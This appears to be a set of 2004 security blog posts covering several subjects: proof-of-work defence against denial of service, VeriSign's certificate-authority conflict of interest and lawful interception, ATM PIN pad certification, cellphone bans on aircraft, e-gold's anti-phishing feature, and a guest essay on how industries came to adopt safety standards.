    The solution then may be to put guards further out, and insist the client matches the server load, or exceeds it. Under DOS conditions, the guards far out on the net look at packets and return errors if the work factor is not sufficient. The error returned can include the current to-the-minute standard. A valid client with one honest request can spend a minute calculating. A DDOS attack will then have to do much the same - each minute, using the new work factor parameters.
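
    Here's a minimal sketch of that guard, hashcash-style; the names and the challenge string are hypothetical. The client burns CPU finding a partial collision (leading zero bits), the guard verifies it with a single hash, and the "to-the-minute standard" is just the bits parameter:

        import hashlib
        from itertools import count

        def solve(challenge, bits):
            # Client: find a nonce whose hash starts with `bits` zero bits.
            for nonce in count():
                h = hashlib.sha256(challenge + str(nonce).encode()).digest()
                if int.from_bytes(h, "big") >> (256 - bits) == 0:
                    return nonce

        def verify(challenge, nonce, bits):
            # Guard: one cheap hash to check, however expensive the search was.
            h = hashlib.sha256(challenge + str(nonce).encode()).digest()
            return int.from_bytes(h, "big") >> (256 - bits) == 0

        nonce = solve(b"minute-standard-2004-09-28T06:38", 16)        # ~65,000 tries on average
        print(verify(b"minute-standard-2004-09-28T06:38", nonce, 16)) # True, in one hash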

    Will it work? Who knows - until we try it. The reason I think of this is that it is the way many of our systems are already structured - a busy tight center, and a lot of smaller lazy guards out front. Think Akamai, think smart firewalls, think SSL boxes.

    The essence though is to start thinking about it. It's time to change the mantra - DOS should be considered in the security equation, if only at the standards of neutrality. Just because we can't stop DOS, it is no longer acceptable to say we ignore it.

    Posted by iang at 06:38 AM | Comments (5) | TrackBack

    September 22, 2004

    WebTrust: "It's about not causing popups..."

    WebTrust is the organisation that sets auditing standards for certificate authorities. Its motto, "It's a matter of trust," is of course the marketing message they want you to absorb, and subject to skepticism. How deliciously ironic, then, that when you go to their site and click on Contact, you get redirected to another domain that uses the wrong certificate!

    http://www.cpawebtrust.org/ is the immoral re-user of WebTrust's certificate. It's a presumption that the second domain belongs to the same organisation (the American Institute of Certified Public Accountants, AICPA), but the information in whois doesn't really clear that up due to conflicts and bad names.

    What have WebTrust discovered? That certificates are messy, and are thus costly. This little cert mess is going to cost them a few thousand to sort out, in admin time, sign-off, etc etc. Luckily, they know how to do this, because they're in the business of auditing CAs, but they might also stop to consider that this cost is being asked of millions of small businesses, and this might be why certificate use is so low.

    Posted by iang at 07:04 AM | Comments (0) | TrackBack

    September 01, 2004

    VeriSign's conflict of interest creates new threat

    There's a big debate going on in the US and Canada about who is going to pay for Internet wire-tapping. In case you hadn't been keeping up, Internet wire-tapping *is* coming. The inevitability of it is underscored by the last-ditch efforts of the ISPs to refer to older Supreme Court rulings that the cost should be picked up by those requiring the wire tap. I.e., it's established in US law that the cops should pay for each wiretap [1].

    I got twigged to a new issue by an article [2] that said:

    "To make wiretapping possible, Internet phone companies have to buy equipment and software as well as hire technicians, or contract with VeriSign or one of its competitors. The costs could run into the millions of dollars, depending on the size of the Internet phone company and the number of government requests."

    What caught me by surprise was the mention of Verisign. So I looked, and it seems they *are indeed* in the business of subpoena compliance [3]. I know most won't believe me, given their public image as a trusted ecommerce player, so here's the full page:

    NetDiscovery Service for CALEA Compliance

    Complete Lawful Intercept Service

    VeriSign's NetDiscovery service provides telecom network operators, cable operators, and Internet service providers with a streamlined service to help meet requirements for assisting government agencies with lawful interception and subpoena requests for subscriber records. NetDiscovery is the premier turnkey service for provisioning, access, delivery, and collection of call information from operators to law enforcement agencies (LEAs).

    Reduce Operating Expenses

    Compliance also requires companies to maintain extensive records and respond to government requests for information. The NetDiscovery service converts content into required formats and delivers the data directly to LEA facilities. Streamlined administrative services handle the provisioning of lawful interception services and manage system upgrades.

    One Connection to LEAs

    Compliance may require substantial capital investment in network elements and security to support multiple intercepts and numerous law enforcement agencies (LEAs). One connection to VeriSign provides provisioning, access, and delivery of call information from carriers to LEAs.

    Industry Expertise for Continued Compliance

    VeriSign works with government agencies and LEAs to stay up-to-date with applicable requirements. NetDiscovery customers benefit from quick implementation and consistent compliance through a single provider.

    CALEA is the name of the bill that mandates law enforcement agency (LEA) access to telcos - each access should carry a cost. The cops don't want to pay for it, and neither do the suppliers. Not to mention, nobody really wants to do this. So in steps VeriSign with a managed service to handle wiretaps, eavesdropping, and other compliance tasks as directed under subpoena. On first blush, very convenient!

    Here's where the reality meter goes into overdrive. VeriSign is also the company that sells about half of the net's SSL certificates for "secure ecommerce" [4]. These SSL certificates are what presumptively protect connections between consumers and merchants. It is claimed that a certificate that is signed by a certificate authority (CA) can protect against the man-in-the-middle (MITM) attack and also domain name spoofing. In security reality, this is arguable - they haven't done much of a job against phishing so far, and their protection against some other MITMs is somewhere between academic and theoretical [5].

    A further irony is that VeriSign also runs the domain name system for the .com and the .net domains. So, indeed, they do have a hand in the business of domain name spoofing; the trivial ease of mounting this attack has in many ways influenced the net's security architecture by raising domain spoofing to something that has to be protected against [6]. But so far nothing much serious has come of that [7].

    But getting back to the topic of the MITM protection afforded by those expensive VeriSign certificates. The point here is that, on the one hand, VeriSign is offering protection from snooping, and on the other hand, is offering to facilitate the process of snooping.

    The fox guarding the chicken coop?

    Nobody can argue with the synergies that come from the engineering aspects of such a mix: we engineers have to know how to attack a system in order to defend it. This is partly the origin of the term "hacker," being one who has to crack into machines ... so he can learn to defend them.

    But there are no such synergies in governance, nor I fear in marketing. Can you say "conflict of interest?" What is one to make of a company that on the one hand offers you a "trustworthy" protection against attack, and on the other hand offers a service to a most likely attacker [8]?

    Marketing types, SSL security apologists and other friends of VeriSign will all leap to their defence here and say that no such thing is possible. Or even if it were, there are safeguards. Hold on to that thought for a moment, and let's walk through it.

    How to MITM the CA-signed Cert, in one easy lesson

    Discussions on the cryptography list recently brought up the rather stunning observation that the Certificate Authority (CA) can always issue a forged certificate and there is no way to stop this. Most attack models on the CA had assumed an external threat; few consider the insider threat. And fair enough, why would the CA want to issue a bogus cert?

    In fact the whole point of the PKI exercise was that the CA is trusted. All of the assumptions within secure browsing point at needing a trusted third party to intermediate between two participants (consumer and merchant), so the CA was designed by definition to be that trusted party.

    Until we get to VeriSign's compliance division that is. Here, VeriSign's role is to facilitate the "provisioning of lawful interception services" with its customers, ISPs amongst them [9]. Such services might be invoked from a subpoena to listen to the traffic of some poor Alice, even if said traffic is encrypted.

    Now, we know that VeriSign can issue a certificate for any one of their customers. So if Alice is protected by a VeriSign cert, it is an easy technical matter for VeriSign, pursuant to subpoena or other court order, to issue a new cert that allows them to man-in-the-middle the naive and trusting Alice [10].

    It gets better, or worse, depending on your point of view. Due to a bug in the PKI (the public key infrastructure based on x.509 keys that manages keys for SSL), all CAs are equally trusted. That is, there is no firewall between one certificate authority and another, so VeriSign can issue a cert to MITM *any* other CA-issued cert, and every browser will accept it without saying boo [11].
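
    A toy model of that bug - mine, for illustration; real path validation also checks signatures, expiry and so on. The point is what the browser does not check: nothing ties a CA to the domains it may vouch for.

        trusted_roots = {"VeriSign Root", "SomeOtherCA Root"}   # hypothetical root store

        def browser_accepts(cert):
            # The only question asked: did *some* trusted root sign the chain?
            return cert["issuer_root"] in trusted_roots

        alice = {"domain": "mail.example.com", "issuer_root": "SomeOtherCA Root"}
        mitm  = {"domain": "mail.example.com", "issuer_root": "VeriSign Root"}
        print(browser_accepts(alice), browser_accepts(mitm))    # True True - no firewall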

    Technically, VeriSign has the skills, they have the root certificate, and now they are in the right place. MITM never got any easier [12]. Conceivably, under orders from the court, VeriSign would now be willing to conduct an MITM against its own customers and its own certs, in every place that it has a contract for LEA compliance.

    Governance? What Governance?

    All that remains is the question of whether VeriSign would do such a thing. The answer is almost certainly yes: Normally, one would say that the user's contract, the code of practice, and the WebTrust audit would prevent such a thing. After all, that was the point of all the governance and contracts and signing laws that VeriSign wrote back in the mid 90s - to make the CA into a trusted third party.

    But, a court order trumps all that. Judges strike down contract clauses, and in the English common law and the UCC, which is presumably what VeriSign operates under, a judge can strike out clauses or even strike down an entire law.

    Further, the normal way to protect against over zealous insiders or conflicts of interests is to split the parties: one company issues the certs, and another breaches them. Clearly, the first company works for its clients and has a vested interest in protecting the clients. Such a CA will go to the judge and argue against a cert being breached, if it wants to keep selling its wares [13].

    Yet, in VeriSign's case, it's also the agent for the ISP / telco - and they are the ones who get it in the neck. They are paying a darn sight more money to VeriSign to make this subpoena thing go away than Alice ever paid for her cert. So it comes down to "big ISP compliance contract" versus "one tiny little cert for a dirtbag who's probably a terrorist."

    The subpoena wins all ways, well assisted by economics. If the company is so ordered, it will comply, because it is its stated goal and mission to comply, and it's paid more to comply than to not comply.

    All that's left, then, is to trust in the fairness of the American juridical system. Surely such a fight of conscience would be publicly viewed in the courts? Nope. All parties except the victim are agreed on the need to keep the interception secret. VeriSign is protected in its conflict of interest by the judge's order of silence on the parties. And if you've been following the news about PATRIOT 1,2, National Security Letters, watchlists, no-fly lists, suspension of habeas corpus, the Plame affair, the JTTF's political investigations and all the rest, you'll agree there isn't much hope there.

    What are we to do about it?

    Then, what's VeriSign doing issuing certs? What's it doing claiming that users can trust it? And more apropos, do we care?

    It's pretty clear that all three of the functions mentioned today are real functions in the Internet market place. They will continue, regardless of our personal distaste. It's just as clear that a world of Internet wire-tapping is a reality.

    The real conflict of interest here is in a seller of certs also being a prime contractor for easy breachings of certs. As it's the same company, and as both functions are free market functions, this is strictly an issue for the market to resolve. If conflict of interest means anything to you, and you require your certs to be issued by a party you can trust, then buy from a supplier that doesn't also work with LEAs under contract.

    At least then, when the subpoena hits, your cert signer will be working for you, and you alone, and may help by fighting the subpoena. That's what is meant by "conflict of interest."

    I certainly wouldn't recommend that we cry for the government to fix this. If you look at the history of these players, you can make a pretty fair case that government intervention is what got us here in the first place. So, no rulings from the Department of Commerce or the FCC, please, no antitrust law suits, and definitely no Star Chamber hearings!

    Yet, there are things that can be done. One thing falls under the rubric of regulation: ICANN controls the top level domain names, including .net and .com which are currently contracted to VeriSign. At least, ICANN claims titular control, and it fights against VeriSign, the Department of Commerce, various other big players, and a squillion lobbyists in exercising that control [14].

    It would seem that if conflict of interest counts for anything, removing the root server contracts from VeriSign would indicate displeasure at such a breach of confidence. Technically, this makes sense: since when did we expect DNS to be anything but a straightforward service to convert domain names into numbers? The notion that the company now has a vested interest in engaging in DNS spoofing raises a can of worms that I suspect even ICANN didn't expect. Being paid to spoof doesn't seem like it would be on the list of suitable synergies for a manager of root servers.

    Alternatively, VeriSign could voluntarily divest one or other of the snooping / anti-snooping businesses. The anti-snooping business would be then a potential choice to run the DNS roots, reflecting their natural alignments of interest.


    Addendum: 2nd February 2005. Adam Shostack and Ian Grigg have written to ICANN to stress the dangers in conflict of interest in selection of the new .net TLD.

    [1] This only makes sense. If the cops didn't pay, they'd have no brake on their activity, and they would abuse the privilege extended by the law and the courts.

    [2] Ken Belson, Wiretapping on the Net: Who pays? New York Times, http://www.iht.com/articles/535224.htm

    [3] VeriSign's pages on Calea Compliance and also Regulatory Compliance.

    [4] Check the great statistics over at SecuritySpace.com.

    [5] In brief, I know of these MITMs: phishing, click-thru-syndrome, CA-substitution. The last has never been exploited, to my knowledge, as most attacks bypass certificates, and attack the secure browsing system at the browser without presenting an SSL certificate.

    [6] D. Atkins, R. Austein, Threat Analysis of the Domain Name System (DNS), RFC 3833.

    [7] There was the famous demonstration by some guy trying to get into the DNS business.

    [8] Most likely? 'fraid so. The MITM is extraordinarily rare - so rare that it is unmeasurable and to all practical intents and purposes, not a practical threat. But, as we shall see, this raises the prospects of a real threat.

    [9] VeriSign, op cit.

    [10] I'm skipping here the details of who Alice is, etc., as they are not relevant. For the sake of the exercise, consider a secure web mail interface that is hosted in another country.

    [11] Is the all-CAs-are-equal bug written up anywhere?

    [12] There is an important point which I'm skipping here, that the MITM is way too hard under ordinary Internet circumstances to be a threat. For more on that, see Who's afraid of Mallory Wolf?.

    [13] This is what is happening in the cases of RIAA versus the ISPs.

    [14] Just this week: VeriSign to fight on after ICANN suit dismissed
    U.S. Federal District Court Dismisses VeriSign's Anti-Trust Claim Against ICANN with Prejudice and the Ruling from the Court.
    Today: VeriSign suing ICANN again

    Posted by iang at 06:20 AM | Comments (5) | TrackBack

    August 13, 2004

    How much to crack a PIN code entry device?

    All forms of security are about cost/benefit and risk analysis. But people have trouble with the notion that something is only secure up to a certain point [1]. So suppliers often pretend that their product is totally secure, which leads to interesting schisms between the security department and the marketing department.

    Secrecy is one essential tool in covering up the yawning gulf between the public's need to believe in absolute security, and the supplier's need to deliver a real product. Quite often, anything to do with security is kept secret. This is claimed to deliver more protection, but that protection, known as "security by obscurity," can lead to a false sense of security.

    In my experience, another effect often occurs: institutional cognitive dissonance surrounding the myth of absolute security leads to security paralysis. Not only is the system secure, by fiat, but any attempt to point out the flaws is treated somewhere between an affront and a crime. Then, when the break occurs, regardless of the many unheeded warnings, widespread shock spreads rapidly as beliefs are shattered.

    Anyway, getting to the point: banks and other FIs rarely reveal how much security is built in, using real numbers. Below, the article reveals a dollar number for an attack on a PIN Entry Device (PED). For those in a hurry, skip down to the emboldened sections, half way down.

    [1] addendum: This article, Getting Naked for Big Brother amply makes this point.



    Original URL: http://www.theregister.co.uk/2004/07/21/atm_keypad_security/
    The ATM keypad as security portcullis
    By Kevin Poulsen, SecurityFocus (klp at securityfocus.com)
    Published Wednesday 21st July 2004 09:38 GMT

    Behold the modern automated teller machine, a tiny mechanical fortress in a world of soft targets. But even with all those video cameras, audit trails, and steel reinforced cash vaults, wily thieves armed with social engineering techniques and street technology are still making bank. Now the financial industry is working to close one more chink in the ATM's armor: the humble PIN pad.

    Last year Visa International formally launched a 50-point security certification process for "PIN entry devices" (PEDs) on ATMs that accept Visa. The review is exhaustive: an independent laboratory opens up the PED and probes its innards; it examines the manufacturing process that produced the device; and it attacks the PED as an adversary might, monitoring it, for example, to ensure that no one can identify which buttons are being pressed by sound or electromagnetic emission. "If we are testing a product that is essentially compliant, we typically figure it's about a four week process," says Ken Kolstad, director of operations at California-based InfoGard, one of three certification labs approved by Visa International worldwide.

    If that seems like a lot of trouble over a numeric keypad, you haven't cracked open an ATM lately. The modern PED is a physically and logically self contained tamper-resistant unit that encrypts a PIN within milliseconds of its entry, and within centimeters of the customer's fingertips. The plaintext PIN never leaves the unit, never travels over the bank network, isn't even available to the ATM's processor: malicious code running on a fully compromised Windows-based ATM machine might be able to access the cash dispenser and spit out twenties, but in theory it couldn't obtain a customer's unencrypted ATM code.

    The credit card companies have played a large role in advancing the state of this obscure art. In addition to Visa's certification program, MasterCard has set a 1 April, 2005 deadline for ATMs that accept its card to switch their PIN encryption from DES to the more secure Triple DES algorithm (some large networks negotiated a more lenient deadline of December 2005). But despite these efforts, the financial sector continues to suffer massive losses to increasingly sophisticated ATM fraud artists, who take home some $50m a year in the U.S. alone, according to estimates by the Electronic Funds Transfer Association (EFTA). To make these mega withdrawals, swindlers have developed a variety of methods for cloning or stealing victims' ATM and credit cards.

    Some techniques are low-tech. In one scam that Visa says is on the rise, a thief inserts a specially-constructed sleeve in an ATM's card reader that physically captures the customer's card. The con artist then lingers near the machine and watches as the frustrated cardholder tries to get his card back by entering his PIN. When the customer walks away, the crook removes the sleeve with the card in it, and makes a withdrawal.

    At the more sophisticated end, police in Hong Kong and Brazil have found ATMs affixed with a hidden magstripe reader attached to the mouth of the machine's real reader, expertly designed to look like part of the machine. The rogue reader skims each customer's card as it slides in. To get the PIN for the card, swindlers have used a wireless pinhole camera hidden in a pamphlet holder and trained on the PED, or fake PIN pads affixed over the real thing that store the keystrokes without interfering with the ATM's normal operation. "They'll create a phony card later and use that PIN," says Kurt Helwig, executive director of the EFTA. "They're getting pretty sophisticated on the hardware side, which is where the problem has been."

    Solenoid fingers

    Visa's certification requirements try to address that hardware assisted fraud. Under the company's standards, each PED must provide "a means to deter the visual observation of PIN values as they are being entered by the cardholder". And the devices must be sufficiently resistant to physical penetration so that opening one up and bugging it would either cause obvious external damage, cost a thief at least $25,000, or require that the crook take the PIN pad home with him for at least 10 hours to carry out the modification.

    "There are some mechanisms in place that help protect against some of these attacks... but there's no absolute security," says InfoGard's Kolstad. "We're doing the best we can to protect against it."

    That balancing approach - accounting for the costs of cracking security, instead of aspiring to be unbreakable - runs the length and breadth of Visa's PED security standards. Under one requirement, any electronics utilizing the encryption key must be confined to a single integrated circuit with a geometry of one micron or less, or be encased in Stycast epoxy. Another requirement posits an attacker with a stolen PED, a cloned ATM card, and knowledge of the cyphertext PIN for that card. To be compliant, the PED must contain some mechanism to prevent this notional villain from brute forcing the PIN with an array of computer-controlled solenoid fingers programmed to try all possible codes while monitoring the output of the PED for the known cyphertext.

    "In fact, these things are quite reasonable," says Hansup Kwon, CEO of Tranax Technologies, an ATM company that submitted three PEDs for approval to InfoGard. Before its PIN pads could be certified, Tranax had the change the design of the keycaps to eliminate nooks and crannies in which someone might hide a device capable of intercepting a cardholder's keystrokes. "We had to make the keypad completely visible from the outside, so if somebody attacks in between, it's complete visible," says Kwon.

    Where Visa went wrong, Kwon says, is in setting an unrealistic timetable for certification. When Visa launched the independent testing program last November, it set a 1 July deadline: any ATMs rolling into service after that date would have to have laboratory certified PIN pads, or they simply couldn't accept Visa cards.

    That put equipment makers in a tight spot, says Kwon. "It's almost a six months long process... If you make any design modification, it takes a minimum of three months or more to implement these changes," he says. "So there was not enough time to implement these things to meet the Visa deadline."

    Visa International's official position is that they gave manufacturers plenty of time - 1 July saw 31 manufacturers with 105 PIN pads listed on the company's webpage of approved PEDs. But in late June, with the deadline less than a week away, Visa suddenly dropped the certification deadline altogether. "I think what we realized was that it was important to work with the other industry players," says spokesperson Sabine Middlemass.

    Visa says it's now working with rival MasterCard to develop an industry wide standard before setting a new deadline for mandatory compliance. In the meantime, the company is encouraging vendors to submit their PIN pads for certification under the old requirements anyway, voluntarily, for the sake of security.

    Copyright © 2004, SecurityFocus (http://www.securityfocus.com/)
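
    As an aside from me, not the article: for readers wondering what "PIN encryption" looks like concretely, here's a minimal sketch of the ISO 9564 format-0 PIN block with the Triple DES the article mentions, via the Python "cryptography" package (whose newer releases relegate TripleDES to a legacy module - fittingly). The key and card number are made-up examples; a real PED does all this inside tamper-resistant hardware, not in Python.

        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

        def iso0_pin_block(pin, pan):
            # PIN field: 0, PIN length, PIN digits, padded with F to 16 nibbles.
            pin_field = bytes.fromhex(("0" + str(len(pin)) + pin).ljust(16, "F"))
            # PAN field: 0000 + rightmost 12 PAN digits, excluding the check digit.
            pan_field = bytes.fromhex("0000" + pan[:-1][-12:])
            return bytes(a ^ b for a, b in zip(pin_field, pan_field))

        key = bytes.fromhex("0123456789ABCDEFFEDCBA9876543210")   # sample 2-key TDES key
        block = iso0_pin_block("1234", "4999988887777000")
        enc = Cipher(algorithms.TripleDES(key), modes.ECB()).encryptor()
        print(enc.update(block).hex())   # the 8-byte encrypted PIN block leaves the PED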

    Posted by iang at 06:20 AM | Comments (1) | TrackBack

    August 11, 2004

    Cellphones on aircraft

    Ever since the British Midland crash at Kegworth in 1989, when an engine failed and the pilots shut down the wrong one from instrument confusion, mobile phones have been banned on British aircraft, and other countries more or less followed suit. Cell phones (mobiles, as they are called in many countries) were blamed initially, and as some say, it's guilty until proven innocent in air safety.

    Now there is talk of allowing them again [1] [2]. They should never have been banned in the first place. Here's why.

    (As a security engineer, it's often instructive to reverse-engineer the security decisions of other people's systems. Security is like economics: we don't get to try out our hypotheses except in real life. So we have to practice where we can. Here is a security-based analysis on whether it's safe to fly and dial.)

    In security, we need a valid threat. Imagined threats are a waste of time and money. Once we identify and validate the threat (normally, by the damage it does) we create a regime to protect against it. Then, we conduct some sort of test to show that the protection works. Otherwise, we are again wasting our time and money. We would be negligent, as it were, because we are wasting the client's money and potentially worse if we get it wrong.

    Now consider pocket phones. It's pretty easy to see they are an imagined threat - there is no validated case [3]. But skip that part and consider the protection - banning mobile phones.

    Does it work? Hell no. If you have a 747 full of people, what is the statistical likelihood of someone leaving their phone on accidentally? Quite significant, really. Enough that there is going to be a continual, ever-present threat of transmissions. Inescapably, mobile phones are on when the plane takes off and lands - through sheer accident. The back-of-envelope calculation below makes the point.
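
    With my numbers rather than anyone's statistics: if each of 400 passengers independently forgets to switch off with probability 1%, the chance that at least one phone is live on any given flight is

        p_forgot, passengers = 0.01, 400
        print(1 - (1 - p_forgot) ** passengers)   # ~0.982 - near certainty, every flight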

    In real safety systems, asking people not to do it is stupid. If it has to be stopped, it has to be stopped proactively. Which means one of three things:

    If planes are vulnerable, then the operators have to respond. As they haven't responded, we can easily conclude that the planes are not vulnerable. If it turns out that they are vulnerable, then instead of the warnings being justified as some might have it, we have a different situation:

    The operators would be negligent. Grossly and criminally, probably, as if a plane were to go down through cell phone interference, saying "but we said 'turn it off'" simply doesn't cut the mustard.

    So, presumably, planes are not vulnerable to cell phones.

    PS: so why did operators ban phones? Two reasons that I know of. In the US, there were complaints that fast-moving phones were confusing the cells. Also, the imminent roll-out of in-flight phones in many airlines was known to be a dead duck if passengers could use their own cellphones...

    [1] To talk or not to talk, Rob Bamforth
    http://www.theregister.co.uk/2004/08/09/in_flight_comms/
    [2] Miracles and Wonders By Alan Cabal
    http://www.nypress.com/17/30/news&columns/AlanCabal.cfm
    [3] This extraordinarily flawed security analysis leaves one gaping... but it does show that if a cellphone is blasting away 30cm from flight deck equipment, there might be a problem.
    http://www.caa.co.uk/docs/33/FOD200317web.pdf

    Posted by iang at 05:05 AM | Comments (1) | TrackBack

    July 31, 2004

    e-gold stomps on phishing?

    Almost forgotten in the financial world, but e-gold, the innovative digital gold currency issuer based in Florida, USA (and nominally in Nevis, East Caribbean), was one of the biggest early targets for phishing [1]. Because of their hard money policy, stolen e-gold has always been as highly prized by crooks as by its fan base of libertarians and gold enthusiasts [2].

    Now it seems that they may have had success in stopping phishing and keylogging attacks; anecdotal reports indicate that their AccSent program has delivered the goods [3]. The company rarely announces anything these days, but the talk among the merchants and exchangers is that there's been relative peace since May. Before that, again anecdotally, losses seemed to be around the "thousands per day" mark, which racks up about a million over a year. Small beer for a major financial institution, but much more serious for e-gold, which has on the order of $10 million in float [4].

    From the feelings of merchants, it seems to have been somewhere between totally and stunningly successful. Nobody's prepared to state what proportion has been eliminated, but a success rate of around 90% is how I'd characterise it. Here's how it works, roughly [5]:

    "AccSent monitors account access attempts and issues a one-time PIN challenge to those coming from IP address ranges or browsers that differ from the last authorized account access. The AccSent advantage is that e-gold Users need not take any action - or even understand what an IP address or a phishing attack is - to immediately benefit from this innovative new feature. However, as powerful as AccSent is, the best protection against phishing and other criminal attacks is user education."

    If it stomps phishing and keylogging dead for e-gold, is this a universal solution? I don't think so. As welcome as it is, I suspect all this has done is push the phishers over to greener pastures - the mainstream banks. If every financial institution were to implement this, the phishers would just get more sophisticated.

    But in the meantime, this is a programme well worth emulating: even if it just makes attacks hard enough to push the phishers down the street to the next muggins, that's welcome. This is the equivalent of putting deadlocks on your doors. The point is not to make your house impenetrable, but to make it harder than your neighbour's house.

    It's also welcome in that any defence lets the people who have to deal with this get to grips with phishing and keylogging attacks in a concrete manner. Until now, there's been precious little but hot air. Concrete benefits lead to understanding and better benefits; hot air just leads to balloons.

    [1] Earliest report of a phishing attack on the company is 2001.

    [2] See the May Scale, the essential Internet monetarist's guide, showing e-gold at #3.

    [3] e-gold's Account Sentinel is described here: http://e-gold.com/accsent.html

    [4] Compare this with the guesstimates of around a billion for mainstream phishing losses:
    http://www.financialcryptography.com/mt/archives/000159.html

    [5] A news snippet here: http://e-gold.com/news.html

    Posted by iang at 12:19 PM | Comments (0) | TrackBack

    July 04, 2004

    Security Industry - a question of history

    Will Kamishlian has written an essay on the question I posed to the Internet security community last week: "why is the community being ignored?" It's a good essay, definitely worth reading for those looking for the "big" perspective on the Internet. Especially great is the tie-in to previous innovative booms and the consequent failures in quality. Does it answer the question? You be the judge!


    [Will Kamishlian writes...] This is a long outburst. The reason for this is that I am tired of industry experts telling us that the growth of the Internet is something completely new and different. It isn't. Students of history can map and track the growth of the Internet against that of other industries. History *does not* repeat itself; however, historical conditions *do*. It is the study of historical conditions that allows us to understand the context of electronic commerce in modern society, as a means to predict and plan for its growth. This outburst is not intended to be definitive; rather, I merely hope it will inspire thought.

    Here's the problem of personal information vulnerability as I see it, from the lowest to the highest level.

    1. User Level

    The problem of phishing stems from the rendering of HTML within an email client. I started to receive phish email long before I knew about the problem. I ignored these messages because the URL in the email did not match that of my bank, etc. That would not have been the case had I been using a client that rendered messages in HTML.

    2. Software Provider Level

    Users want their Internet experience to be seamless and user-friendly. Therefore, software providers are going to continue to add new features and functionality to their email clients, browsers, etc. in a quest to provide an *easy* experience. Therefore, problem #1 is not going away. In fact, it will get worse. As new features are added, so too will new vulnerabilities. Software providers will -- as they have in the past -- patch these vulnerabilities piecemeal.

    3. Industry Level

    At the industry level, a widespread disagreement will remain about how to pro-actively protect the user. Individual software providers will resist any intervention that may potentially limit the features that they can provide to users. Therefore, problem #2 is not going away.

    At the moment, the problem could be solved at the industry level. As the article notes, there is no shortage of security experts or of advice. The professionals exist. What is needed is a consortium that can agree on an extremely basic security model from which all security aspects can be devolved -- from models to specifications. The model must be so basic that no provider can argue with its validity. Extensions to this basic model would provide lower-level models from which specifications and certifications could be devolved.

    4. Societal Level

    Users want more features, and providers want to satisfy users; however, in doing so, users are getting harmed. In the long term, there are four possible scenarios for this state of affairs:

    * Over time, users will accept the harm and adopt the technology

    * Industry will adopt universal technology to prevent harm

    * Industry will create a third party to ensure safe guards

    * Government will step in to introduce safe guards

    By long term, I refer to a state of maturation for electronic commerce over the Internet.

    Ian's article caught my eye because I am a student of history, and have been tracking the Internet boom against other booms in the past, such as that of the growth of the railroad industry, from its inception to its maturity.

    The growth of the Internet mirrors the birth, boom and maturity of several industries. These come quickly to mind:

    * Railroad

    * Electrical

    * Airline

    * Automotive

    In each of these industries, consumers initially accepted a relatively high risk of potential harm as a cost of doing business. As each of these industries matured, consumer pressure produced improvements in consumer safety. Note that the author refers to these industries as they grew in the United States.

    Regarding the current state of affairs for electronic commerce, we can draw lessons from the means by which each of the above industries responded to the pressures for consumer safety. Each of the above responded in a unique manner to societal pressures for consumer safety.

    Railroad Industry

    Major railroad disasters caught the public attention (much as airline disasters do now) during the 1860's and 1870's. Over time, industry players universally adopted safety technology -- primarily the telegraph and air brakes -- that did much to improve consumer safety. The final piece of railroad consumer safety was put in place when the industry convened to adopt standard time -- an institution that lives with us today. The universal adoption of new technology and of standard time was possible because by the 1870's there were a few major players, which could impose their will on the entire industry, and which could foresee that consumer safety improvements would lead to increased revenues.

    Electrical Industry

    The electrical industry responded in a manner much different from that of the railroad industry. Unlike in the railroad industry, there were no headlines of failures leading to the deaths of tens of people at a time. On the other hand, adoption of electricity in the home was slowed by the fact that electricity was a very new and unknown (to the consumer) technology, so that electrical accidents -- in the industry's infancy -- were accorded the horror of the unknown.

    During the electrical industry's infancy, major players realized that they could achieve widespread adoption by ensuring consumer safety. At the same time, insurance companies were often bearing the cost of electrical catastrophes. The insurance companies, in conjunction with the electrical industry, created Underwriters Laboratories (UL) -- another institution that lives with us today. Thus, a third party was created with the single goal of providing consumer safety.

    Airline Industry

    Consumer safety in the airline industry progressed in a way dissimilar to both of the above. During the 1930's, the public was horrified by news accounts of airline disasters (much as the public had been horrified by train disasters decades earlier). The difference between the 1930's and the 1870's is that by the 1930's, consumers had adopted the notion that the government could and should enact legislation to ensure consumer safety. As a result, societal pressures built to the point that politicians quickly stepped in to provide consumer safety, and the forerunner to the Federal Aviation Administration (FAA) was formed. The FAA now influences airline passenger safety on a worldwide level.

    Automotive Industry

    The automotive industry comes last on this list because it was forced to adopt consumer safety measures long after this industry had matured. The reasons for this are that unlike the railroad and airline industries, catastrophes did not make front page news, and unlike the electrical industry, the technology did not represent the unknown -- automobiles were an advancement on the horse and buggy. Until the 1960's, consumers accepted a relatively low level of safety because safety was viewed as a consumer issue.

    Safety in the automotive industry changed in the 1960's, due in large part to the efforts of Ralph Nader. Nader used statistics to demonstrate the lack of concern on the part of the automotive industry. While individual car crashes did not make front page news, Nader's statistics of thousands of preventable deaths did make news. Auto makers did not initially respond to the societal pressure that Nader created, and as a result, the government stepped in. The Department of Transportation began to promulgate automotive safety regulation.

    During the 1970's, class action lawsuits brought a new type of pressure on the automotive industry. Huge payouts in cases such as the Ford Pinto suit brought us a new breed of lawyer, adept at winning large sums from juries sympathetic to descriptions of death and bodily harm caused by negligence on the part of manufacturers. I do not have a strong opinion on the net effect these lawsuits have had on consumer safety; however, I suspect that they have increased costs to the consumer in greater measure than they have improved overall consumer safety. Class action lawsuits are won when the defendant is found *provably* negligent. The lesson to the industry is to not be caught *provably* negligent.

    The Electronic Commerce Industry

    Where does all of this history leave us? We can find relevant historical conditions from each of these industries, and from these conditions, we can plan for the future of electronic commerce. From the foregoing, we can accept that consumers expect the government to step in quickly whenever an industry is viewed as negligent with regard to consumer safety (as in the airline and automotive industries).

    The infancy of the electronic commerce industry is similar to that of the electrical industry in that the Internet has an aspect of the unknown, although unlike the electrical industry, failures and accidents in the electronic commerce industry do not lead to death or injury. Nevertheless, we can expect that consumer adoption of electronic commerce will be slowed until consumers are reassured that their safety is protected by a technology they do not understand.

    Unlike the railroad and airline industries, failures in electronic commerce do not usually make front page news. On the other hand, politicians and interest groups are beginning to weigh in with statistics -- at a governmental level. We can expect that there will be pressure on the government to regulate this industry. Witness the quick passage of legislation designed to prevent spam.

    Like the railroad industry, there are a few major players (that provide electronic commerce software) that could move to self-regulate the entire industry. To simplify the current state of affairs, Microsoft will not adhere to standards that it either does not control or that may limit its ability to offer new features. Other players are loath to adhere to standards that Microsoft controls. Therefore, we cannot expect that the major players in the software industry will move to self-regulate *unless*, as was the case with the railroad industry, the major players come to believe that cooperation would lead to higher revenues for all participants.

